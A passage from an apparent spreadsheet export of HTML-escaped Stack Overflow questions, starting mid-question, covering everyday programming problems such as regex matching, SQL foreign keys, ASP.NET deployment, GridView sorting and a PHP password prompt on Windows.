&lt;pre&gt;&lt;code&gt;store.UndoManager.UndoState = UndoState.Disabled;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But by disabling it all existing previous actions in the undo list are cleared.&lt;/p&gt;
&lt;p&gt;Transactions have a property called "isHidden" but it's readonly i don't know how i can set the to hidden.
I also tried to create a new UndoManager but it's also a readonly property...&lt;/p&gt;
&lt;p&gt;How can i create a transaction that does not appear in the undo list?&lt;/p&gt;
&lt;p&gt;I'd be glad to write some more details in order to clarify any doubts,
Thank you very much,
LuÃ­s Filipe&lt;/p&gt;
&lt;p&gt;[added]&lt;/p&gt;
&lt;p&gt;i paint every shape's background based on a property value. E.g, green if true, red if false. I need to open a transaction to paint the shape's background but for me it behaves as a calculated (read-only) property.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the best practices to log an error?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Many times I saw logging of errors like these:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;System.out.println("Method aMethod with parameters a:"+a+" b: "+b);
print("Error in line 88");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;so.. What are the best practices to log an error?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;This is java but could be C/C++, basic, etc.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Regex match question</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In javascript, I've got a block of HTML like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;h2&amp;gt;{title}&amp;lt;/h2&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a href="{url}"&amp;gt;{content}&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And I'm trying use regex "match" to spit out an array of all the {item}'s. So my output should look like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;['title', 'url', 'content']
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've gotten as far as:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var pattern = new RegExp("\{[a-zA-Z]+\}+");
var match = pattern.exec("{Sample} bob {text}");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But it's only returning the first tag. &lt;/p&gt;
&lt;p&gt;This is just beyond my regex skills. Can anyone help?&lt;/p&gt;
&lt;p&gt;Cheers!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Which is more efficient in Python: standard imports or contextual imports?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I apologize in advance if this question seems remedial.&lt;/p&gt;
&lt;p&gt;Which would be considered more efficient in Python:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Standard import&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import logging
try:
  ...some code...
exception Exception, e:
  logging.error(e)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;...or...&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Contextual import&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;try:
  ...some code...
exception Exception, e:
  import logging
  logging.error(e)
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How to Check if File is ASCII or Binary in C++</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So using the system command file we can use file to determine if a file is ASCII Text or "data".  I wanted to know if there is a way to check in code which one it was?  I want to basically throw a corrupt error if the file is 'data'. I am using ifstream for reading the files.  Thanks for any help!&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Duplicate of &lt;a href="http://stackoverflow.com/questions/277521/how-to-identify-the-file-content-is-in-ascii-or-binary#277538"&gt;this question&lt;/a&gt;.&lt;/strong&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I remove a specific number of files using python (version 2.5)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to remove two files from a folder at the conclusion of my script. Do I need to create a function responsible for removing these two specific files? I would like to know in some detail how to use os.remove (if that is what I should use) properly. These two files will always be discarded at the conclusion of my script (which packages a series of files together in a zip format). Thanks in advance.  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Win32 console processes in VISTA - 10% CPU, but VERY SLOW</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a Win32 console application which is doing some computations, compiled in Compaq Visual Fortran (which probably doesn't matter). &lt;/p&gt;
&lt;p&gt;I need to run a lot of them simultaneously.&lt;/p&gt;
&lt;p&gt;In XP, they take around 90-100% CPU together, work very fast.
In Vista, no matter how many of them I run, they take no more than 10% of CPU (together), and work very slow respectively.&lt;/p&gt;
&lt;p&gt;There is quite a bit of console output going on, but now VERY much.
I can minimize all the windows, it does not help. CPU is basically doing nothing...&lt;/p&gt;
&lt;p&gt;Any ideas?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;No, these are different machines, but they run relatively the same hardware. 2. Threads are not used, this is a VERY OLD (20 yrs) plain app for DOS, compiled in win32. It is supposed to compute iterations until they meet, consume all it has. My impression - VISTA just does NOT GIVE IT MORE CPU&lt;/p&gt;
</t>
  </si>
  <si>
    <t>using date range in Lucene.net</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I understand how Lucene.net can work for text indexing. Will I be able to efficiently search for documents based on a given date range? Or will Lucene.net just use text matching to match the dates?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Mount/Unmount USB drives with VBSCript</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking for a way to mount\unmount a USB flash drive using VBScript.  This is the closest I was able to get.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Sub EjectDrive(strDrive)
On Error Resume Next
CONST SSF_DRIVES = 17
Set objShell = CreateObject("Shell.Application")
Set objDrive = objShell.Namespace(SSF_DRIVES).ParseName(strDrive)
objDrive.InvokeVerb "E&amp;amp;ject"
End Sub
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Performance comparison of Thrift, Protocol Buffers, JSON, EJB, other?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We're looking into transport/protocol solutions and were about to do various performance tests, so I thought I'd check with the community if they've already done this:&lt;/p&gt;
&lt;p&gt;Has anyone done server performance tests for simple echo services as well as serialization/deserialization for various messages sizes comparing EJB3, Thrift, and Protocol Buffers on Linux?&lt;/p&gt;
&lt;p&gt;Primarily languages will be Java, C/C++, Python, and PHP.&lt;/p&gt;
&lt;p&gt;Update: I'm still very interested in this, if anyone has done any further benchmarks please let me know. Also, very interesting benchmark showing &lt;a href="http://bouncybouncy.net/ramblings/posts/more%5Fon%5Fjson%5Fvs%5Fthrift%5Fand%5Fprotocol%5Fbuffers/"&gt;compressed JSON performing similar / better than Thrift / Protocol Buffers&lt;/a&gt;, so I'm throwing JSON into this question as well.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Disappearing Foreign Keys in phpMyAdmin</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am creating a new table inside mysql and I am trying to add a foreign key constraint to one of the fields.&lt;/p&gt;
&lt;pre&gt;
CREATE TABLE `onlineorder` (
  `receiptid` varchar(10) NOT NULL default '',
  `delivereddate` date default NULL,
  `cid` int(10) NOT NULL,
  `card#` int(10) default NULL,
  `expire` date default NULL,
  PRIMARY KEY  (`receiptid`),
  FOREIGN KEY (receiptid) REFERENCES purchase
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
&lt;/pre&gt;
&lt;p&gt;However, after it creates it, I go into phpMyAdmin and export the table.  and it seems like the foreign key constraint has disappeared.&lt;/p&gt;
&lt;pre&gt;
CREATE TABLE `onlineorder` (
  `receiptid` varchar(10) NOT NULL default '',
  `delivereddate` date default NULL,
  `cid` int(10) NOT NULL,
  `card#` int(10) default NULL,
  `expire` date default NULL,
  PRIMARY KEY  (`receiptid`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
&lt;/pre&gt;
&lt;p&gt;Does phpMyAdmin get rid of foreign keys or am I doing something wrong here?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Adding handlers to Dynamically Created Context Menu</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to populate a context menu from a database at run time.  I do not know the number of items that will be in the list, so I would like to handle the click event in a single place.  How do I declare the handler so I can tell which menu item actually triggered the click.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Public Function GetBookmarkContextMenu(ByVal aBookmark As Bookmark) As System.Windows.Controls.ContextMenu
    Dim myContextMenu As New Controls.ContextMenu
    myContextMenu.Name = "BookmarkMenu" 
             For Each aMailingList As MasterService.FalconBookmarkMailingListType In GlobalUserSettings.MailingLists
                Dim mySubMenuItem As New Controls.MenuItem
                mySubMenuItem.Name = "MailingListName" &amp;amp; aMailingList.ID.ToString
                mySubMenuItem.Header = aMailingList.Title
                AddHandler (myMenuItem.Click), AddressOf ForwardToList_Click
                mySubMenuItem.IsEnabled = True
                myMenuItem.Items.Add(mySubMenuItem)
            Next
            myContextMenu.Items.Add(myMenuItem)
            return myContextMenu
End Function
Public Sub ForwardToList_Click()
    'How do I know which of the dynamically created items was clicked?
End Sub
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Changing a Property into a Method - any side effects?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a class that has some properties. And I want something that calculates a Score out of these properties. Since this is a trivial task (some additions and divisions, but nothing spectacular).&lt;/p&gt;
&lt;p&gt;So naturally, the question is: "When to use a Property with some code in the getter, and when to use a function?", and &lt;a href="http://stackoverflow.com/questions/67063/"&gt;that question was already answered&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Now, I wonder about one thing though: If - against all expectations - I ever needed to make this Getter so complicated that it should be a function (for example, because I need to put data in or because it can throw an exception or whatever), is it easy to change a Property into a Method?&lt;/p&gt;
&lt;p&gt;Of course, it seems really trivial, just changing&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public double Score {
    get {
        return Math.Round(A + B / C * D,3);
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;to&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public double Score(){
    return Math.Round(A + B / C * D,3);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But I wonder: Are there any side effects? Is anything going to break when changing stuff around like this? I can only ever see this as a possible problem when Reflection is involved, but what in situations where I have 2 Assemblies - one that defines the class and one that uses the class - and only change the one that contains the class without recompiling the consumer assembly. Is that a possible source of "weird bugs that are nearly impossible to track" or is it completely safe to change Properties to Methods?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Huge Transaction Log - Is This Normal?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a 5GB database and a 20GB transaction log (SQL Server 2005). Not sure why it is so large or what happened to make it that large, it used to be around 1/2 the size of the DB. DB grows about 1GB/month. &lt;/p&gt;
&lt;p&gt;Are there any guidelines to how how big your transaction log should be relative to your database file size? &lt;/p&gt;
&lt;p&gt;EDIT: I'm not saying my transaction log is huge (I know some DBAs would laugh at my weenie-sized DB), just in relation to the DB file I think it is huge.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the Windows equivalent of a UNIX shell script?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to have an executable file that will call some other programs. The way I would do this in Linux is with a simple bash script that looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#!/bin/bash
echo "running some-program"
/home/murat/some-program arg1 arg2
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What's the best way to do this kind of thing under Windows?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you get the current time of day?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do you get the current time (not date AND time)?&lt;/p&gt;
&lt;p&gt;Example: 5:42:12 PM&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Partial Keyword Searching (MS SQL 2005)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Current, I've got a stored procedure that has a main goal of doing a full text search through a database table of films and tv shows.  In order to get it to do partial-keyword searching, I added some code in SQL to split up the search query by spaces, and output a statement like the following:&lt;/p&gt;
&lt;p&gt;' "batman*" ~ "be*" '&lt;/p&gt;
&lt;p&gt;The original string, "batman be", for instance, could be generated from a textbox on the page as the user is typing and on each javascript keyup event, I send whatever is in that textbox to the stored proc for results to get results as I type (like autocomplete).  In this case, the user may have been looking for "Batman Begins", or "The Batman: Batgirl Begins" (a TV show episode) and they both should show up as a result.&lt;/p&gt;
&lt;p&gt;Below is a sample of my query. @partialKeywordString is, in the example above, ' "batman*" ~ "be*" '.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT f.title
FROM Films f INNER JOIN
    CONTAINSTABLE(Films, Title, @partialKeywordString) f_key ON f.filmid = f_key.[key]
ORDER BY f_key.Rank DESC
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The problem I have with the query is that the ranking doesn't seem to be exactly what I'd expect.  If I were to just search for "batman", one would believe that all movie titles, beginning with, or only containing the word "batman" would appear first. But they don't.
A sample result of what happens when one searches for just "batman" is below:&lt;/p&gt;
&lt;p&gt;"Batman: The animated series - Episode 114"
"Adventures of Batman and Robin - Episode 218"
"Batman and Robin - Episode 101"
"The Batman - Episode 101"
"Batman and Robin - Episode 204"&lt;/p&gt;
&lt;p&gt;Much further down the list is the movie I was searching for--"Batman Begins" or even just "Batman".&lt;/p&gt;
&lt;p&gt;I'm looking for advice on how to tweak this query--I'm definitely not a SQL expert, and I feel like I just man-handled the above code to get it to work.  I have a feeling there's a more elegant or powerful solution, and I just haven't found it yet.&lt;/p&gt;
&lt;p&gt;Thank you in advance&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to generate sound effects in Java?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for Java code that can be used to generate sound at runtime - NOT playback of existing sound files.&lt;/p&gt;
&lt;p&gt;For example, what's the best code for generating a sawtooth waveform at 440 Hz for a duration of 2 milliseconds? &lt;b&gt;Source code appreciated!&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;I remember my Commodore 128 had a simple Sound command that took as parameters voice, frequency, waveform, and duration to define a sound.  That worked great in a lot of simple cases (quick and dirty games, experiments with sound, etc).&lt;/p&gt;
&lt;p&gt;I am looking specifically for sound-effect like sounds, not music or MIDI (which the &lt;a href="http://www.jfugue.org"&gt;JFugue&lt;/a&gt; library covers quite well).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>AS/400 ODBC Drivers</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have been using the Client Access ODBC drivers when accessing AS/400 data from our .net applications and SQL DTS/SSIS packages. Are there third party drivers that provide better performance or functionality?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to place text in the clipboard so that it pastes as a table in Word?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Using VBA in MS Office, how do I add text to the Windows clipboard so that it will paste into Word as a table?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best way to use a DB table as a message/job queue</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a databases table with ~50K rows in it, each row represents a job that need to be done. I have a program that extracts a job from the DB, does the job and puts the result back in the db. (this system is running right now)&lt;/p&gt;
&lt;p&gt;Now I want to allow more than one processing task to do jobs but be sure that no task is done twice (as a performance concern not that this will cause other problems). Because the access is by way of a sproce, my current though is to replace said sproce with something that looks something like this&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;update tbl set owner=connection_id() where avalable and owner is null limit 1;
select stuff from tbl where owner = connection_id();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;BTW; worker's tasks might drop there connection between getting a job and submitting the results. Also, I don't expect the DB to even come close to being the bottle neck unless I mess that part up (~5 jobs per minute)&lt;/p&gt;
&lt;p&gt;Are there any issues with this? Is there a better way to do this?&lt;/p&gt;
&lt;p&gt;Note: the &lt;a href="http://tripatlas.com/Database_as_an_IPC"&gt;"Database as an IPC anti-pattern"&lt;/a&gt; is only slightly apropos here because 1) I'm not doing IPC (there is no process generating the rows, they all already exist right now) and 2) the primary gripe described for that anti-pattern is that it results in unneeded load on the DB as processes wait for messages (in my case, if there are no messages, everything can shutdown as everything is done)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>CodeDOM &amp; .Net Modules</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I programmatically embed a .Net module to the assembly generated by CodeDOM?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to Consume JSON Web Services from a Windows Client</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to consume a JSON enabled WCF Web Service from a standard Proxy Client (i.e. not JavaScript)? &lt;/p&gt;
&lt;p&gt;Basically I want to minimize the payload size between 2 web services. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Installing a ASP.NET application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Ok, this has got to be a super simple problem.  I just can't seem to find the answer anywhere.  First - I'm not a web developer of any kind, I'm an old school c programmer - so don't flame me for what's probably something quite trivial :)&lt;/p&gt;
&lt;p&gt;I need to write a small proof-of-concept web app using ASP.NET.  My first attempt here is to create a "Hello World!" app.  So I opened up Visual Studio, and made a new web application.  I have my Default.aspx file that calls a C# function that is inside the helloworld.dll created automatically by Visual Studio.&lt;/p&gt;
&lt;p&gt;I installed IIS on my local machine and created a virtual directory in the wwwroot subdirectory.  I put the Default.aspx and helloworld.dll in that directory.  Now when I browse to that page I see the following.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Server Error in '/test' Application.
Parser Error
Description: An error occurred during the parsing of a resource required to service this request. Please review the following specific parse error details and modify your source file appropriately.
Parser Error Message: Could not load type 'HelloWorld._Default'.
Source Error:
Line 1:  &amp;lt;%@ Page Language="C#" AutoEventWireup="true" CodeBehind="Default.aspx.cs" Inherits="HelloWorld._Default" %&amp;gt;
Line 2:  
Line 3:  &amp;lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&amp;gt;
Source File: /test/default.aspx    Line: 1
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Obviously, IIS doesn't know where to look for the .dll or anything like that.  I just don't know how to register the .dll with IIS (or whoever manages that stuff in .net) so that it can find the functions it need.&lt;/p&gt;
&lt;p&gt;Can someone let me know how to "install" an ASP.NET application on IIS?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Getting .png pixel data in Silverlight</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have a Silverlight application that needs to load a number of .png files.  We can load the images OK, but Silverlight doesn't support reading the pixel data from the Image class.&lt;/p&gt;
&lt;p&gt;Can anyone suggest a simple solution for getting at this data?  Our current best bet would be a third party .png loading library, but we are having trouble finding a suitable one.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>list of email addresses that can be used to test a javascript validation script</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone have a list of email addresses that I can use to test my JS address validation script?  I'm looking for as complete of a list as is reasonable to test the most common edge cases, if not all cases.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Tabs, Text-Mate, Editing HTML (Rails)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there any way to force Text-Mate to use a two-space tab instead of a full tab when editing HTML (Rails) documents?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Use GET or POST for a search form</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a couple search forms, 1 with ~50 fields and the other with ~100. Typically, as the HTML spec says, I do searches using the GET method as no data is changed. I haven't run into this problem yet, but I'm wondering if I will run out of URL space soon?&lt;/p&gt;
&lt;p&gt;The limit of &lt;a href="http://support.microsoft.com/kb/208427"&gt;Internet Explorer&lt;/a&gt; is 2083 characters. Other browsers, have a &lt;a href="http://www.boutell.com/newfaq/misc/urllength.html"&gt;much higher limit&lt;/a&gt;. I'm running Apache, so the limit there is around 4000 characters, which IIS is 16384 characters.&lt;/p&gt;
&lt;p&gt;At 100 fields, say average field name length of 10 characters, that's already 5000 characters...amazing on the 100 field form, I haven't had any errors yet. (25% of the fields are multiple selects, so the field length is much longer.)&lt;/p&gt;
&lt;p&gt;So, I'm wondering what my options are. (Shortening the forms is not an option.) Here my ideas:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Use POST. I don't like this as much because at the moment users can bookmark their searches and perform them again later--a really dang nice feature.&lt;/li&gt;
&lt;li&gt;Have JavaScript loop through the form to determine which fields are different than default, populate another form and submit that one. The user would of course bookmark the shortened version.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Any other ideas?&lt;/p&gt;
&lt;p&gt;Also, does anyone know if the length is the encoded length or just plain text?&lt;/p&gt;
&lt;p&gt;I'm developing in PHP, but it probably doesn't make a difference.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; I am unable to remove any fields; I am unable to shorten the form. This is what the client has asked for and they often do use a range of fields, in the different categories. I know that it's hard to think of a form that looks nice with this many fields, but the users don't have a problem understanding how it works.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>asp.net gridview sort without data rebind</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to make a gridview sortable which uses a stored procedure as a datasource, I would not want it to rerun the query each time to achieve this. How would I get it to work my current code is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;protected override void OnPreRender(EventArgs e)
{
    if (!IsPostBack)
    {
    SqlCommand cmd2 = new SqlCommand("SR_Student_Course_List", new SqlConnection(System.Configuration.ConfigurationManager.ConnectionStrings["RDCV2ConnectionString"].ConnectionString));
    try
    {
        cmd2.CommandType = CommandType.StoredProcedure;
        cmd2.CommandTimeout = 120;
        cmd2.Parameters.Add("student_id", SqlDbType.Char, 11).Value = student;
        cmd2.Connection.Open();
        grdCourses.DataSource = cmd2.ExecuteReader();
        grdCourses.DataSourceID = string.Empty;
        grdCourses.DataBind();
    } finally
    {
        cmd2.Connection.Close();
        cmd2.Connection.Dispose();
        cmd2.Dispose();
    }}}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This code just binds the data when it isn't a postback, the gridview has viewstate enabled. On pressing the column headers a postback happens but no sorting occurs. If anyone has a simple fix for this please let me know or even better an ajax sort which would avoid the postback would be even better. The dataset is relatively small however takes a long time to query which is why I would not like to requery on each sort.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How should I interact with the geometry of a UIView, disregarding any transforms applied?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a view that I would like the user to rotate around its center, by tapping and holding somewhere and just move their finger round and round.&lt;/p&gt;
&lt;p&gt;I have all the geometry worked out; What I do is store the initial touch angle relative to the center as offsetAngle, then my touchesMoved method looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;- (void) touchesMoved: (NSSet *)touches withEvent:(UIEvent *)event {
    self.transform = CGAffineTransformMakeRotation(0);
    CGPoint location = [[touches anyObject] locationInView: self];    
    CGPoint actualCenter = [self convertPoint: self.center fromView: self.superview];    
    CGPoint relativeTouch = [MathHelper translatePoint:location relativeTo: actualCenter];
    CGPoint zero = CGPointMake(0, 0);
    float angle = [MathHelper getAngleForPoint:zero andPoint:relativeTouch];
    self.transform = CGAffineTransformMakeRotation(offsetAngle-angle);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The ugly bit is the first line, where I have to restore the rotation in order to get the correct event positions in the view. If I don't that, then the locations jump all over the place as there's no continuity, since the view is rotating...&lt;/p&gt;
&lt;p&gt;Another issue is when you want to manipulate a view's frame (eg. moving it down), when the view has a transform applied:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;- (IBAction)toggleSettingsView {
    BOOL state = [settingsSwitch isOn];
    float height = optionsView.bounds.size.height;
    CGRect polygonFrame = polygonView.frame; 
    [UIView beginAnimations:@"advancedAnimations" context:nil]; 
    [UIView setAnimationDuration:0.3]; 
    if (state) {
        optionsView.alpha = 1.0; 
        polygonFrame.origin.y += height; 
    } else {
        optionsView.alpha = 0.0; 
        polygonFrame.origin.y -= height; 
    }
    polygonView.frame = polygonFrame;
    [UIView commitAnimations]; 
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This distorts the view heavily.&lt;/p&gt;
&lt;p&gt;I must mention that both the CGTransform and the CALayer transform have the same effect.&lt;/p&gt;
&lt;p&gt;This smells like I'm doing something wrong, but I don't know what I should be doing.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Creating a selector from a method name with parameters</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a code sample that gets a &lt;code&gt;SEL&lt;/code&gt; from the current object, &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SEL callback = @selector(mymethod:parameter2);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And I have a method like &lt;/p&gt;
&lt;pre&gt;&lt;code&gt; -(void)mymethod:(id)v1 parameter2;(NSString*)v2 {
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now I need to move &lt;code&gt;mymethod&lt;/code&gt; to another object, say &lt;code&gt;myDelegate&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;I have tried:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SEL callback = @selector(myDelegate, mymethod:parameter2);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but it won't compile. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I clean up dead connections using Oracle?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Right now I have a few new applications being developed against an Oracle Database, and sometimes they crash or fail to end correctly, etc... anyways the problem is they sometimes seem to leave their connections open, and I need to cleanup after them.
My question is if there is a way from the database-side of things to determine dead connections and clean them up?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it really not possible to write a php cli password prompt that hides the password in windows?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have spent several hours trying to find a means of writing a cross platform password prompt in php that hides the password that is input by the user.  While this is easily accomplished in Unix environments through the use of stty -echo, I have tried various means of passthru() and system() calls to make windows do the same thing to no avail.&lt;/p&gt;
&lt;p&gt;I have tried:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;passthru('set /p pass=Password: ');
system('echo %pass% &amp;gt; out.txt');
$pass = file_get_contents('out.txt', 'r');
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This seems to hang on the passthru('set /p pass=Password: '); line without allowing me to input any text and must be killed with a Ctrl-c.&lt;/p&gt;
&lt;p&gt;I have also tried various methods of fgetc and fgets and printing backspace characters to hide the input since this works in other languages.  However, PHP does not appear to be able to interact with text prior to a carriage return.&lt;/p&gt;
&lt;p&gt;I would really like to find a way to make this work, is this an impossible task or is this something that can be done?&lt;/p&gt;
&lt;p&gt;Note that I am aware that I could wrap the php script in a batch file and pass the password as a command line argument, but that doesn't work for me in this case.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Hash Collision - what are the chances?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have some code on my PHP powered site that creates a random hash (using &lt;code&gt;sha1()&lt;/code&gt;) and I use it to match records in the database.&lt;/p&gt;
&lt;p&gt;What are the chances of a collision? Should I generate the hash, then check first if it's in the database (I'd rather avoid an extra query) or automatically insert it, based on the probability that it &lt;em&gt;probably&lt;/em&gt; won't collide with another.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Javascript libraries to extend built in data type objects</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;There are a number of great Javascript libraries\frameworks out there (jQuery, Prototype, MooTools, etc.), but they all seem to focus on DOM interaction and AJAX functionality. I haven't found any that focus on extending the built-in data types (String, Date, Number, etc.). And by "Extending" I mean methods to solve typical work-a-day problems we all have. &lt;/p&gt;
&lt;p&gt;An example would be the .NET String.Format() method. Not only more convenient, but makes reading and trouble-shooting string concatenation better. While I have already created a String prototype method for this, I'd like to see if a good library has already been developed to address similar productivity issues before launching into a library of my own.&lt;/p&gt;
&lt;p&gt;Prototype has a few interesting methods in this regard, but since I've already settled on jQuery for DOM work, I really don't need to duplicate functionality on every page.&lt;/p&gt;
&lt;p&gt;Is anyone aware of a good, lean data type productivity library for Javascript?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Which command will executed first,If a stored procedure have individual multiple select commands;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Which command will executed first,If a stored procedure have individual multiple select commands;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Do I get a finished slot if a start QProcess using startDetached</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Do I get a finished signal if I start a QProcess using startDetached()? I'm trying to start a process, but I need to be able to get an event when the process has terminated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to show Vista style balloon hints in Delphi?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;On input validation, I'm using balloon tips instead of message boxes.
My problem is that on Vista, they have the old XP style with the rounded corners, not the newer more rectangle like appearance.&lt;/p&gt;
&lt;p&gt;I've tried creating them using CreateWindowEx and &lt;code&gt;tooltips_class32&lt;/code&gt; or showing the Edit's associated balloontip using SendMessageW and &lt;code&gt;EM_SHOWBALLOONTIP&lt;/code&gt;, the result is the same.
Doing the same thing in Visual Studio and C# results in a Vista style balloon tip.&lt;/p&gt;
&lt;p&gt;You can see an example of the balloon hint I need, when you toggle Caps Lock while in a password edit, like the one on the Windows Logon.&lt;/p&gt;
